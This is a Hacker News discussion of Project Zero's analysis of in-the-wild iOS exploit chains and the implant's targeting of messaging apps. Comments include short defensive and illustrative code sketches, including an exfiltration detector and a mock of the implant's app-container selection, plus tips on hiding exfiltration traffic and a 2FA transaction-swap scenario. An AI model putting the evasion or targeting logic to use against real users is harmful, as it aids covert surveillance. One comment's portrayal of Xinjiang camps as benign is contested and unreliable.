A deep dive into iOS Exploit chains found in the wild (googleprojectzero.blogspot.com)
804 points by troydavis 9 months ago | 182 comments



These are fascinating. It would be very interesting to know what the character and subject matter of the infecting sites were.

Outside of the great tech writeup, what is particularly interesting about this, to me, from a geopolitical perspective is the level of restraint.

The malicious actors in this case leveraged iOS zero-days for years, yet do not seem to have overextended themselves or risked exposure by widening their intended targets. What I mean is: they clearly could have achieved a massive infection rate by combining this with hacking a well-known popular site, or by pulling more visits from (say) social media. Instead, the malicious actor chose to limit the intended recipients, running the exploits against a smaller set of targets for much longer while remaining undetected.

This, to me, hints at a state-actor with specific intent.


> Earlier this year Google's Threat Analysis Group (TAG) discovered a small collection of hacked websites. The hacked sites were being used in indiscriminate watering hole attacks against their visitors, using iPhone 0-day.

Crazy that the Implant was never detected directly on a phone. It's certainly visible to iOS itself, but apparently iOS isn't looking for unexpected processes running on the phone. The Implant was also sending network traffic that no one ever noticed or tracked down. And presumably it had some effect on battery life. But all of this just disappears into the noise of everything else going on on an iPhone.

I wonder if the Implant ever showed up in any of the crash reports collected by iOS and uploaded to Apple.
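To make the "unexpected processes" point concrete: if iOS exposed any kind of process audit, flagging the Implant would be a trivial allowlist check, since it made no attempt to hide. A hypothetical sketch (the daemon names and the allowlist are invented for illustration, not taken from iOS):

```python
# Hypothetical sketch: an allowlist-based process audit that *could* have
# surfaced the Implant, if anything on the device were looking for it.
# All names here are illustrative, not a real iOS process inventory.

EXPECTED_DAEMONS = {"launchd", "SpringBoard", "backboardd", "wifid"}

def unexpected_processes(running):
    """Return process names not in the known-good set, sorted."""
    return sorted(set(running) - EXPECTED_DAEMONS)

# The Implant ran as an ordinary unhidden process; a snapshot check like
# this would flag it immediately.
snapshot = ["launchd", "SpringBoard", "wifid", "implant_payload"]
print(unexpected_processes(snapshot))  # ['implant_payload']
```

The point of the thread stands either way: nothing on a stock iPhone performs (or exposes) a check like this, so the anomaly disappears into the noise.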


It would be fun to check, but the attackers could just turn it off.

It's a user-facing option: https://support.apple.com/en-us/HT202100


Of course they could, but according to Google the Implant didn't make any attempt to hide itself.

I'm the tech lead for my company's in-house mobile app crash reporter. Every so often we get reports that make no sense. Sometimes they are corrupted in strange ways which I just chalked up to bad device memory or storage, but who knows if something like this wasn't the cause. Semi-related, but I used to have jailbreak detection in the crash reporter SDKs but I had to remove it. Just attempting to detect a jailbroken device was in some cases causing the SDK to crash because the anti-jailbreak detection code injected into the app was buggy.


If you are under constant attack from well funded enemies who want to destroy you, attacking iOS with well focused exploits is a good way of getting intelligence. The enemy may be lulled into a false sense of security on iOS and if the exploit goes undiscovered for a long time, a lot of intelligence can be obtained.


> the malicious actor chose to limit their intended recipients

I wonder how many people you would need to infect, on average, until you were detected?

I would guess, with this exploit chain and the lack of auditing available for iOS internals, that the actual exploit could run a billion-plus times before detection. The biggest risk is someone noticing the wedged WebKit renderer process and trying to debug it. I bet that causes oddities when hooked up to a Mac with devtools open.

Of the whole thing, the HTTP network traffic is probably by far the biggest red flag, and perhaps 1 out of 10 million people might notice/investigate it. Simple things like never connecting over wifi (the cell network is far harder to sniff) and redirecting traffic, encrypted, via a popular CDN would be a good way to hide it.
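To illustrate how loud plaintext exfiltration is from a defender's perspective, a heuristic along these lines would flag it in almost any traffic log (the threshold and the raw-IP detail are my assumptions for the sketch, not claims about the actual C2):

```python
# Defender's-eye sketch: trivial red-flag heuristic for exfil-like traffic.
# Threshold and raw-IP assumption are illustrative, not from the write-up.

import ipaddress
from urllib.parse import urlparse

def looks_like_exfil(url, bytes_sent):
    u = urlparse(url)
    plaintext = u.scheme == "http"        # no TLS at all
    try:
        raw_ip = bool(ipaddress.ip_address(u.hostname))
    except ValueError:
        raw_ip = False                    # a hostname, not a bare IP
    bulky = bytes_sent > 1_000_000        # large, steady uploads
    return plaintext and (raw_ip or bulky)

print(looks_like_exfil("http://203.0.113.7/upload", 5_000_000))  # True
print(looks_like_exfil("https://cdn.example.com/x", 100))        # False
```

This is also why routing encrypted traffic through a popular CDN hides so well: it fails every cheap test like this and blends into traffic the device generates anyway.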


> redirecting traffic, encrypted, via a popular CDN would be a good way to hide it

True, but wouldn't that lead western three letter agencies to an account with a credit card attached? Sure, criminals can get stolen cards, but I imagine those have a limited lifespan and chasing after payment problems is not what the hacker wants to be doing.


This isn't script-kiddie level hacking. Considerable resources were spent developing those exploits, probably by a nation state. Such actors being unable to get untraceable cards/identities is highly unlikely.

For a three-letter agency, legal issues might be the bigger hurdle. E.g. you might have to make sure that the data passing through the CDN, and thus the CDN itself, isn't in some other jurisdiction when spying on your own citizens.


> leveraged zero-days for iOS for years

Isn't that a problem with the iOS walled garden? Not even security researchers can properly investigate users' devices and detect infections like this, the way they can with desktop operating systems...


A step in the right direction: Apple recently announced that next year security researchers will have access to special iPhones: https://www.theverge.com/2019/8/8/20756629/apple-iphone-secu...


I agree this is "a step in the right direction", but if the iPhones are special, would the exploit run on them?

I suppose it depends on how "special" they are—do they run standard iOS with normal Safari and actual apps?


I think it just means they can run unsigned code. But yes, I would presume that Safari and the other default apps are present.


Production iPhones can do that already. These phones probably give researchers root access and allow for disabling AMFI, etc.


No, it has nothing to do with that. The only difference is that you can’t buy snake-oil virus scanners in the iOS App Store because they can’t even pretend to work.


The Apple iOS model has advantages and disadvantages. The issue cited is not a problem unique to the iOS walled garden model.

See: CVE-2019-1162

See: CVE-2017-6074


I hear this a lot, but is it something that actually happens to a meaningful extent on other systems? Does it balance out the fact that black hats (and state-sponsored actors) can find exploits they would not have found otherwise if they didn't have the source?


Absolutely. It is such a disgrace to open society that we have allowed our phones, computers and cars to be so taken over by corporate interest that we cannot even peek inside.

NB I heard some infosec research companies actually get rooted phones from Apple with some big caveats.


That's why Android is far safer. No exploits there.


This is what the free market chose. People bought these devices en masse and continue to do so.

It’s on us - the end user.


there's no better alternative.

no, please don't tell me about android. that's a fucked up mine field altogether.

we need to remember that there is no and will never be 100% security. while not open — which is worth nothing to the average user — we get pretty close with ios given all we know.


The list of apps being monitored which are hardcoded directly in the implant[1] include :

    com.yahoo.Aerogram
    com.microsoft.Office.Outlook
    com.netease.mailmaster
    com.rebelvox.voxer-lite
    com.viber
    com.google.Gmail
    ph.telegra.Telegraph
    com.tencent.qqmail
    com.atebits.Tweetie2
    net.whatsapp.WhatsApp
    com.skype.skype
    com.facebook.Facebook
    com.tencent.xin
[1] https://googleprojectzero.blogspot.com/2019/08/implant-teard...
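Mechanically, matching a hardcoded list like this against what's installed is as simple as a set intersection. An illustrative sketch only (this is not the Implant's actual code, and real iOS container paths are UUID-based, not derived from bundle IDs):

```python
# Illustrative sketch, not the Implant's code: intersecting a hardcoded
# target list with the apps actually installed on a device.

TARGETED_BUNDLES = {
    "com.google.Gmail", "net.whatsapp.WhatsApp", "ph.telegra.Telegraph",
    "com.tencent.xin", "com.atebits.Tweetie2",   # subset of the list above
}

def containers_to_upload(installed_bundle_ids):
    """Return the bundle IDs whose data containers would be exfiltrated."""
    return sorted(b for b in installed_bundle_ids if b in TARGETED_BUNDLES)

print(containers_to_upload(["com.google.Gmail", "com.apple.Maps",
                            "com.tencent.xin"]))
# ['com.google.Gmail', 'com.tencent.xin']
```

Per the teardown, the hardcoded list was only the default: the C2 could also enumerate all third-party apps and request any container it wanted.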


This is an odd list. Some big messaging apps like Signal and Line are notably missing, while tools like Mail Master and Voxer seem like pretty minor players compared to the rest.

Is there a particular region of the world or community where this specific list makes most sense?


I suppose this list must be combined with the following explanation: "To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group."[^1]

So the suspects are countries that fight against the autonomy of a region where the population is ethnically different. The most obvious suspect is China: they have gulag camps in Xinjiang where Uygurs are interned, up to 1.1 million according to the UN[^2]. The dominant ethnic group in China is the Han, and Uygurs have been oppressed for decades.

Of course, other countries could do this, but the probability of Burma/Rohingya, Saudi Arabia/Yemen… seems much lower. On a side note, Voxer seems to be quite prominent in China, judging by the popularity of their Android app[^3].

[^1]: https://googleprojectzero.blogspot.com/2019/08/a-very-deep-d...

[^2]: https://www.theguardian.com/world/2019/jan/11/if-you-enter-a...

[^3]: https://play.google.com/store/apps/details?id=com.rebelvox.v...


To shed some more light on the situation, the Uyghurs in the region had affirmative action programs and were exempt from the one child policy. They had more perks than regular Han Chinese.

However, with the spread of Salafism [1] in that region, China started to suffer multiple terrorist attacks a year. With the worst resulting in 35 deaths and hundreds injured [2].

As a result, to stop these terrorist attacks, China started these de-radicalization centres. Since then, there have been no attacks.

1. latimes.com/world/asia/la-fg-china-saudi-arabia-20160201-story.html

2. en.wikipedia.org/wiki/2014_Kunming_attack


> The most obvious suspect is China: they have gulag camps in Xinjiang where Uygurs are interned, up to 1.1 million according to the UN[^2]. The dominant ethnic in China is Han, and Uygurs have been oppressed for decades.

But China doesn't need exploits to spy on their iPhone-using citizens, right? Because Apple has been cooperating with the Chinese government.


Do you have some evidence of that? Aside from iCloud hosting and App Store censorship, I haven’t heard of a case where they’ve weakened security for the Chinese government.


"Aside from iCloud hosting" is a pretty big "aside"


It's a pretty big aside but it is not iOS


I must have been thinking of iCloud.


> Some big messaging apps like Signal and Line are notably missing

Line is mostly used in Japan, Signal is mostly used by nerds. So you can assume neither Japanese people nor nerds were their primary target. Given that this is true for the vast majority of the world's population, I'd not call this odd.


I've recently seen a surge of non-nerd Signal users. Mostly random people from my contacts starting to use it.


Hopefully a popularity surge will translate into the app getting better. It's notably less pleasant to use than Telegram, which I'd think of as its closest competitor.


Given that Telegram uses an entirely different encryption scheme, and does not e2e encrypt by default, I'd consider Wire (using some variation of the Signal protocol) the closest competitor. And Wire is rather pleasant to use, with clients on many platforms, sign-up with phone number or email, encrypted voice chat, encrypted group chats, etc.


Wire is pretty good these days, but I'd go for Matrix due to it being federated.


See, I'd consider WhatsApp the closest competitor - it's the most similar feature-wise, and the Signal Foundation is primarily funded by one of the WhatsApp founders.


What features of Telegram are more pleasant? I don't use Telegram much due to its makeshift encryption scheme and bad defaults (no E2E by default), but I've found Signal extremely usable in the last year or two.


Opening up the picker for sending a picture was notably slow. Approximately a three second count from pressing the button to having the pictures available to choose from. Then similar occasional lags throughout the process (e.g. hitting "back" from a picture to return to the library and select a second picture).

By contrast, Telegram has a quick selection of the last few pictures available immediately, and the general picker opens quicker if you request it -- maybe because it's using the stock iOS picker rather than the custom one Signal implements?

Since sending a picture to a contact was a super common action of mine, this was incredibly frustrating.

Signal also had notification issues if I was running the desktop client at the same time. It'd sometimes clear notifications from my phone before I'd actually read them in either location.


Thanks. I've never encountered either of those issues, possibly because I'm on Android. Specifically, the photo quick selection is instant for me.


Telegram does not use the system iOS photo picker, since it asks for permission to access all photos on the system.


Might need that just for the initial recent-pictures bit?


Facebook Messenger also seems to be missing, as does "Messenger Lite", made for parts of the world without good connectivity; neither is on the list despite being very popular.


Line is the default messaging app in Taiwan, so one would assume that the Chinese government would be interested in targeting it.


com.tencent.xin (WeChat) makes a lot of sense in China https://en.wikipedia.org/wiki/Tencent_QQ


com.netease.mailmaster -- NetEase is a Chinese app platform


In addition though:

> The command-and-control server can also query for a list of all 3rd party apps and request uploads of their container directories.


These are all social networking services. Maybe, just maybe, this was tied to the PRISM program led by the NSA?


Maybe, just maybe, this was tied to the space program at NASA?

Tremendously unlikely, PRISM was something very different from this.


PRISM would have had to migrate to methods like this with the rise in e2e encryption.

I doubt they'd have written such shoddy and simple implant code though. At a minimum, they would have encrypted the data uploaded, since intelligence agencies love to steal data from other intelligence agencies, and sniffing wires I'm sure isn't unique to the USA.


No, PRISM had nothing to do with this at all. PRISM didn’t involve any sort of attack or offensive capability, and anything doing that would not be PRISM.


Wasn't PRISM mostly to spy on Americans? Most of the apps there aren't very popular in the US, and half of them are just straight up Chinese. Seems more like it would be a PRISM-like program but in some Asian country or China.


14 iOS exploits, including 0-days, and they upload all data to their C2 using plaintext http? With this level of sophistication I feel like it can only be intentional, but why?

edit: their implant is compiled unoptimized, has NSLog statements, and serializes data by writing everything as files to /tmp (a "rather odd design pattern", as Ian Beer put it), in addition to the http issue just described. The implant/C2 code was likely written by a separate, less experienced team than the one that wrote the exploit chains (which might have simply been purchased?).


Because the entity who supplied the exploit has no relation to the entity who supplied the implant and control framework. The latter is commodity developer work, easily done in house or via a defense contractor. It's not unlikely that the exploit developer had no idea what it was being used in or how.


In my experience infosec people tend to be pretty awful programmers. They are experts at mining other people's code bases for common exploit patterns but not so great at the wider systems/engineering stuff.

But agreed, it was probably purchased from some vuln dev and put together by some hack gov employee with some Microsoft certifications, or (far less likely) by some indifferent blackhat with powerful weapons well out of his scope, although "black market zero day markets" are mostly non-existent hype. Especially for multiple iOS vulns. There's a good reason the cost of those exploits is so high given the low level of programming talent around in security.

Watering holes + "targeting sub-communities" typically mean spies hitting up some conference website or industry news thing. Who knows what country they are in and how sophisticated their local CS people are.


> In my experience infosec people tend to be pretty awful programmers.

Awful at using good design patterns, unit tests, and neat code maybe... But not "write everything to /tmp, tar it up and upload it cleartext".


Cleartext is the issue, here.

Even the most basic infosec folk will be aware to not do that - what this does is, as others have said, reveal that the developers were not the ones who found the exploit - it was likely simply purchased.


> With this level of sophistication I feel like it can only be intentional, but why?

Hehe, I have an idea. It's kind of crazy, so I assign it <10% probability, but if I were right it seems to kind of work:

Plausible deniability.

We all "know" that well funded three letter agencies wouldn't let shoddy work like this pass.

As long as you aren't afraid that anyone will capture it in transit this is a good way to avoid suspicion.

Which could explain why it was so overdone: to make sure everybody sees how unlikely it is that a state actor has done it.


They own all the pipes, why bother hiding what passes through them?


After thinking about this a little longer...

Not only does the attacker have no one they care about hiding from, but also: the lack of encryption is a secondary attack.

Sure, when Vizio did this, it was probably incompetence... but here... trivially encrypting data is simple stuff, so why not do it when siphoning large streams of personal data?

Because third parties using this data to attack the tracked victims doesn’t hurt the attacker, it in fact helps them. From the state sponsored actor’s perspective, they are merely using these exploits to track minorities and dissidents, but hey, if a third party happens to find this info and use it and that keeps the victims spun up and less effective at organizing? Win-win.


It leaves me in awe how good some hackers are, until it comes to hardening a Linux server. The difference is astounding: not knowing how to set up SSL on Apache, not knowing how to enable UFW (lol, it's "sudo ufw enable"), etc. I was never sure why that dichotomy exists. Then again, I'm a terrible pentester but am very good at Linux.


This is terrifying. Just thinking about the data on a typical phone... the Implant could easily grab everything it needs to empty all of your financial accounts.

The only way to be safe is probably to access your financial sites from a browser running inside a VM, maybe even a dedicated laptop, and never sync the passwords to anywhere outside the VM unencrypted.

Ouch.


>The only way to be safe is probably to access your financial sites

These folks don't want money.

And statute protects you from fraud: just set up text and email alerts so large transactions alert you ASAP.


Except they have control of the phone and can intercept text and email alerts; if not with these exact vulnerabilities, it doesn't seem far-fetched. And getting funds returned takes time while bills still have to be paid.

These folks may not want money, but the phone is vulnerable and the next set of folks may. Do you really think the crooks who commit identity theft and ransomware attacks aren't salivating at these attacks?


>Do you really think the crooks who commit identity theft and ransomware attacks aren't salivating at these attacks?

I think the nation states that will want to use them will clamp down hard on two bit hustlers who interrupt the fun.


I mean that’s generally true but depends on which state actor. North Korea definitely wants your money (or crypto) but Russia doesn’t.


Russia could hypothetically be interested in using your bank account to exfiltrate funds past sanctions though...


The dedicated laptop would be the smarter idea. Running "sensitive" tasks from a VM doesn't provide much protection if the host might be compromised.


I guess you'd have to worry about malware breaking out of the VM as well, but are there many exploits that do that these days?


That's hard to say, but both VirtualBox and VMware were hacked this year[1]. Most secure would definitely be both a dedicated PC and running everything outward-facing from a VM (and using SELinux or AppArmor as well).

[1]: https://securityaffairs.co/wordpress/82702/breaking-news/pwn...


What about a VM that is actually an emulator like Bochs?


Well, you don't necessarily have to jump from one to the other. If you currently do financial stuff on your phone, just enabling 2FA and only browsing them on your laptop is already an enormous step up. There are cases where additional precautions are warranted, but there's no reason to let the perfect be the enemy of the good.


Switching from an iPhone to a laptop is a huge step down in security, even with 2FA.

Orders of magnitude more 0-days on whatever software is running on that laptop than on iOS.

This is bad advice.


I disagree. 2FA makes it profoundly more difficult to compromise an account. Most people use a phone as their second factor, so even if apps don't store files and credentials directly on the device (always in doubt, as seen here), someone with root on the phone can compromise an account without any user interaction.
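For context, the common app-based second factor (TOTP, RFC 6238) is just an HMAC over the current 30-second time window, which is exactly why root on the phone holding the seed defeats it. A minimal stdlib sketch, checked against the RFC's published test vector:

```python
# Minimal TOTP (RFC 6238) sketch: HMAC-SHA1 over the current time step,
# dynamically truncated to a short decimal code.

import hashlib
import hmac
import struct
import time

def totp(secret: bytes, for_time=None, step=30, digits=6) -> str:
    counter = int((time.time() if for_time is None else for_time) // step)
    msg = struct.pack(">Q", counter)                 # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                       # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10**digits).zfill(digits)

# RFC 6238 Appendix B test vector: secret "12345678901234567890", T=59s
print(totp(b"12345678901234567890", for_time=59, digits=8))  # 94287082
```

Note the scheme authenticates only "the right time window", not any particular transaction, which is the weakness the rest of this subthread digs into.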

What's more, every time you download a banking app on your phone, you have to place a little bit of trust in the competence of whoever the bank outsourced the programming job to. At least with a laptop, a poorly designed website is not (by itself) a threat to everything on your computer or other sites you visit.

Even when it comes to "more 0-days", I think you're probably missing the point. There's a lot more software written for computers that can be compromised than just the handful of programs that comprise iOS, so the raw count is not very meaningful. More practically, I'm willing to bet the odds my (Linux) laptop is compromised are far lower than my phone. I don't install apps I don't trust on my computer, but I have little choice but to on my phone.


> What's more, every time you download a banking app on your phone, you have to place a little bit of trust in the competence of whoever the bank outsourced the programming job to. At least with a laptop, a poorly designed website is not (by itself) a threat to everything on your computer or other sites you visit.

Both would require a 0-day exploit to be a threat.


> 2FA makes it profoundly more difficult to compromise an account.

Just because the attacks are dumb.

If your computer is pwned, the malware should just wait for you to complete 2FA, and then when you "log out", not actually log out and do malicious stuff instead.


That's why 2FA should be performed at transaction confirmation time for sensitive operations, not just at login or periodically.


Even then; substitute the transaction they want for another transaction.

If the device you are using is compromised, you're in for a bad time.

You could send some simple transaction summary to the other device to acknowledge, which is getting better. Even so that doesn't completely eliminate the opportunity for tomfoolery.


If you sign with a 2FA I can not see how a compromised computer can make that insecure. Though I will say, the UX on 2FA signing needs to get better, but it is secure enough.


If the 2FA doesn't contain the actual transaction detail, pretty simply.

When user tries to transfer $1,000 of cash from user's investment account to user's bank account, instead, initiate transferring $100,000 to EvilGuy's bank account. Rewrite elements so it appears that $1,000 is being transferred to user's bank account, and wait for user to receive their 2FA code and authenticate. This may be as easy as string replacement both ways.
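The fix the thread is circling around is binding the confirmation code to the transaction details themselves, so a swapped recipient or amount invalidates the code the user approved. A hypothetical sketch (key handling, field names, and the code format are all simplified assumptions):

```python
# Sketch: transaction-bound confirmation codes. The MAC covers the actual
# destination and amount, not just "a login happened", so string-replacing
# the transaction in the browser no longer lets the attacker reuse the code.
# Key distribution is hand-waved; a real scheme lives on a second device.

import hashlib
import hmac

def confirmation_code(key: bytes, dest_account: str,
                      amount_cents: int, digits: int = 6) -> str:
    msg = f"{dest_account}|{amount_cents}".encode()
    d = hmac.new(key, msg, hashlib.sha256).digest()
    return str(int.from_bytes(d[:4], "big") % 10**digits).zfill(digits)

key = b"shared-with-the-second-factor-device"  # hypothetical shared secret
legit = confirmation_code(key, "users-own-savings", 100_000)      # $1,000
swapped = confirmation_code(key, "evilguys-account", 10_000_000)  # $100,000
assert legit != swapped  # the substituted transaction needs a different code
```

The catch, as noted below, is UX: the second device has to display the real destination and amount for the user to verify, or the binding buys nothing.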


maybe on a windows laptop, but people who run laptops using linux probably have more security on the laptop than on their phone; most browsers are pretty safe.


I find this hard to believe given that security isn't about "having security", but about "not having buggy software". Unless you're a power user, you're probably mostly just using web applications at this point, so your main target points are the OS and the web browser.

Someone "using Linux" is likely to be running various things such as SSH/HTTP/file servers, native IRC clients, random build systems (running "npm install" instills a lot of trust on the NPM repository and any packages involved). All of these things increase the attack surface.


> Someone "using Linux" is likely to be running various things such as SSH/HTTP/file servers, native IRC clients, random build systems (running "npm install" instills a lot of trust on the NPM repository and any packages involved). All of these things increase the attack surface.

This is a fallacy. Rather than assessing the security of the linux kernel or linux distributions, you're making an assumption about linux users and transferring the blame for their insecure practices onto linux itself.

Think of it this way: If a random Windows user that didn't engage in such behavior was to switch to linux, it's unlikely that would suddenly change. If the linux kernel and system programs are more secure than Windows, that makes linux a good choice if that person cares about security.

Note: I'm not making a statement about the security of linux/windows, just pointing out a flaw in the above argument.


> Rather than assessing the security of the linux kernel or linux distributions you're making an assumption about linux users

I was responding to that assumption made by the parent:

> people who run laptops using linux probably have more security in the laptop than on their phone


The parent's argument that using a laptop is "orders of magnitude" less safe than using an iOS or Android device is just not true. It depends on what you're running on each device.


When you run any given application on your laptop, it normally runs with all of your user's privileges on the system; that is, it can access all files that you can access, it can look at the screen that you're looking at, it can produce any input that you can produce, it can manipulate the memory of any process that you can manipulate.

When you run an application on iOS or Android, it doesn't have those capabilities. It can only get them through security exploits. In theory it should be similar to looking at a web page. If a web page is able to read arbitrary files, that's obviously a bug in the system. If an application on your laptop is able to read arbitrary files, that's standard functionality.


You're right that from a defense standpoint, sandboxed OSes like Android and iOS are "better" than your average laptop. Granted. The point I (and probably your parent comment) were originally trying to make is that the amount of data stored on a phone makes it a very good target for vulnerabilities like these. None of my banking, chat, email, etc information is stored on my laptop because I access these things through the browser. That's not to say that this provides perfect security, of course, but it means someone can't come in with a zero-day that gets root on my system and just one-off uploads all my databases.

Apps that keep all this data locally, as is common on phones, are dangerous. Add the fact that most people have a phone as their two factor and you have a really bad situation when a phone is compromised. This, alone, makes phones an attractive target.


> because I access these things through the browser.

Meaning the session cookies are stored on your computer, meaning I can steal those and then do whatever nefarious things I want to do off-box. Locality is a myth, attackers don't care about that. They just want the data, and finding/weaponizing bugs is the hard part.


Regular people keep copies of banking, chat, and email printouts in their "My Documents", even if they use web applications instead of native ones for those services.

Speaking of native applications, many regular users still use native applications for email, chat, text processing, spreadsheets, etc.

So while you specifically might take care of having a very clean $HOME, most people don't.


Depends pretty much on what they are actually running.

https://www.cvedetails.com/vendor/33/Linux.html


Using disappearing messages (eg: Signal) is also good.

If compromised, the attacker doesn't get a long log of comms, just a week's worth.


A while ago, Google showed messages at the top of Gmail for some users "We believe state-sponsored attackers might be attempting to compromise your account or computer".

If they had sent some OAuth tokens for a honeypot Gmail account to the C&C server used for these attacks, they could then track the usage patterns of that token and find all the other attacked users. Perhaps that's how they identified who was being attacked?


I was thinking the exact same thing. It's possible that because it has been so long since Google identified this threat actor, they did in fact use a honeypot account to trace the attackers prior to burning them.


Given the depth of China's interest in controlling and accessing dissidents worldwide, I would think it highly likely that China is behind the entire exploit. What I did not see in the articles (too many to read everything) is the requirement to inject the implant from a website. Did the article indicate what sites were compromised?


Nope. But given that the write-up talks about people being victims merely for being in a geographical region, I immediately think of wifi portals and ISP/telecom injection via DNS hijacking.

We already know that ISPs routinely hijack your DNS queries to snarf your search queries, inject ads, redirect you to cached versions of big sites to “speed up your experience”, warn you of virus infection, etc etc.

It would be trivial for a state actor to use the same mechanism to redirect you to a site that, say, looks like Google, passes your search query to Google, returns Google's results, but also serves up the JS that pushes the implant.

Really pushes the issue that everyone, especially activists and targeted minority groups, needs to be educated about DNS and proper VPN usage (a misconfigured VPN would not help here), and it would be awesome if device makers made checking and verifying this stuff easier for ordinary users.
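One way the checking could work: resolve the same name through the local (ISP-assigned) resolver and through an independent resolver you pin (e.g. over DoH), then compare the answers. A stubbed sketch of the comparison logic only; real code would perform the two lookups, and the addresses below are made up:

```python
# Hypothetical DNS-hijack check: the two resolver results are stubbed here;
# real code would query the local resolver and a pinned DoH resolver.

def looks_hijacked(local_answers, trusted_answers):
    """Flag when the local resolver's answers share nothing with the
    trusted resolver's. Disjoint answer sets are a strong hijack signal;
    mere inequality is too strict, since CDNs rotate addresses."""
    return not set(local_answers) & set(trusted_answers)

print(looks_hijacked({"198.51.100.9"},
                     {"142.250.80.46", "142.250.80.14"}))  # True
print(looks_hijacked({"142.250.80.46"},
                     {"142.250.80.46", "142.250.80.14"}))  # False
```

Even this simple comparison has caveats (split-horizon DNS, geo-based answers), which is part of why it's unreasonable to expect normal users to verify any of it by hand.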


You don't need to compromise an ISP to do this stuff. Just use a shady ad-network to deliver malware or links in the same way that targeted ads are delivered.

I'm not a sophisticated state actor, but if I were going to try to deliver a payload to a group of people, I'd use ad networks to target the geography or population I was interested in. A bad actor could easily get a shitty ad network to deliver all sorts of payloads.


If it’s a state actor, as has been alluded to, they’re not compromising the ISP, they are the ISP.

But yeah, absolutely, great point - shitty ads are doable AND geo-targetable!


Anyone know what kinds of sites were hacked to target iOS visitors to the sites, and who might have been targeted by these attacks? The blog post hints at the targeting of dissidents, but I'm not sure whether that is a general concern or actually there in these hacks.


Just a wild and crazy guess here...but if you take this tweet thread: https://twitter.com/adrianzenz/status/1145778611242319874 in context with the following hint:

"To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group." (https://googleprojectzero.blogspot.com/2019/08/a-very-deep-d...)

...and then if you think about what's been going on in Hong Kong recently -- search iPhone and Hong Kong in both languages and you'll find some interesting posts on Twitter that appear not to want folks to know that:

"All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives, yet also as devices which when compromised, can upload their every action into a database to potentially be used against them." (https://googleprojectzero.blogspot.com/2019/08/a-very-deep-d...)

...it kind of reveals itself.


What’s the relation to the first link though? That looks like an old twitter thread.


Did you look at the screenshot and read the translation? Appears to be a real-time tracking database of Uighurs...


In the first link? Yes, but what does the first link have to do with this attack? I see nothing that ties the two together. Am I missing something in the Google link that relates to that? The list of target services doesn’t even look similar.


“The command-and-control server can also query for a list of all 3rd party apps and request uploads of their container directories.”


> dissidents

If nothing else, that would be a pretty good guess, given that amateurs don't have the skill to come up with "five separate, complete and unique iPhone exploit chains", and a professional team with the skill to create them is either going to report the vulnerabilities (white hat) or sell them on the black market, or at least try to infect a large number of people. The specificity of putting them on a single website with only "thousands" of views per week suggests that someone wanted to target visitors of that site specifically, not just for financial gain.


> It is worth noting that none of the exploits bypassed the new, PAC-based JIT hardenings that are enabled on A12 devices.

I'm surprised Apple doesn't talk more about how they're continuously upgrading the security of iPhones with new chip generations. I remember the BlackHat presentation on iPhone security from a few years ago [0] also found that there were attacks on older iPhones which didn't work on the (then-)newer ones. Is Apple afraid it will give the impression that existing phones are not secure?

[0]: https://news.ycombinator.com/item?id=12231758


It is also worth noting that PAC is not a panacea. It's just one more thing to break before an attacker takes control. Given that one of the keys used in PAC is shared across all user-space processes, including highly privileged unsandboxed processes (it must be, as it's used by shared dynamic libraries), it's just a matter of finding one more user-space bug to leak the key and break PAC.


Even if the same key is shared by all processes, keys are stored in registers that are meant to be inaccessible to userspace, so a disclosure vulnerability would not help here anyway.


You don't need to get the key per se, depending on your exploit. You just need a single valid signed pointer that's involved in your ROP gadget.
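To make the replay point concrete, here's a deliberately simplified toy model of PAC-style pointer signing (my own sketch, not how PAC is actually implemented: real PAC uses the QARMA cipher with keys held in registers, and the key name, PAC width, and layout below are invented). The takeaway: you can't forge a signature without the key, but an already-signed pointer leaked from memory re-authenticates just fine for the same context.

```python
import hmac, hashlib

KEY = b"process-shared-IA-key"      # hypothetical key shared across processes
PAC_SHIFT = 48                      # pretend the top 16 bits hold the PAC

def sign(ptr: int, modifier: int) -> int:
    # MAC over the pointer value plus a context "modifier", packed into
    # the (pretend) unused upper bits of the 64-bit pointer.
    msg = ptr.to_bytes(8, "little") + modifier.to_bytes(8, "little")
    pac = int.from_bytes(hmac.new(KEY, msg, hashlib.sha256).digest()[:2], "little")
    return (pac << PAC_SHIFT) | ptr

def authenticate(signed: int, modifier: int) -> int:
    ptr = signed & ((1 << PAC_SHIFT) - 1)
    if sign(ptr, modifier) != signed:
        raise ValueError("pointer authentication failed")
    return ptr

p = sign(0x1000, modifier=7)
assert authenticate(p, 7) == 0x1000   # a validly signed pointer passes

# Flipping a bit without the key fails, but *replaying* a leaked,
# already-signed pointer for the same modifier always passes.
forged_fails = False
try:
    authenticate(p ^ 1, 7)
except ValueError:
    forged_fails = True
assert forged_fails
```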


Apple gave a talk this year at BlackHat that talked about some of the new security mechanisms.


And researchers gave a talk this year at DEF CON that talked about defeating this exact security mechanism.


Link?



You don’t need PAC if you disable scripts in Safari. Besides, baseband/browser/iMessage vulnerabilities are in the same price range. [i]

It also isn’t difficult to infer what a “code signing bypass” is, so I guess being arrested is a good excuse to buy a new phone? (Assuming we’re talking about a state-based actor in control of the territory you live in)

i. https://zerodium.com/program.html


> You don’t need PAC if you disable scripts in Safari.

Safari has multiple JITs. For example, aside from the JavaScriptCore compiler, there’s also a CSS selector JIT.


Talking about security inevitably triggers fear. That’s fine for some products, but absolutely unacceptable for large consumer brands with positive reputations.


Perhaps it would behoove security-sensitive users to use such devices, but they make up a tiny fraction of all iOS devices in the field. 90% of deployed iOS devices in the USA lack the A12 CPU and the number is higher abroad. Obsolete 32-bit CPUs are more common than CPUs with PAC.


> Obsolete 32-bit CPUs are more common than CPUs with PAC.

According to this (taken soon after iPhone XS/XR went on sale) this is not true: https://www.statista.com/statistics/755593/iphone-model-devi...


That apparently costs $50/mo to read. But it seems to discuss iPhone only. The universe of iOS devices is not limited to iPhones.


As a side note: given all the security resources Google has, why is Android still not considered safer than iOS? What mistakes has Google made with Android, and how could they be fixed?


All things considered, I'd say Apple has done an excellent job wrt security for iOS devices. All modern iOS devices are updated on a regular basis with a high uptake rate, and Apple monitors its store and is increasing its use of bug bounties. And with these exploit chains, Apple has addressed the issues quickly.

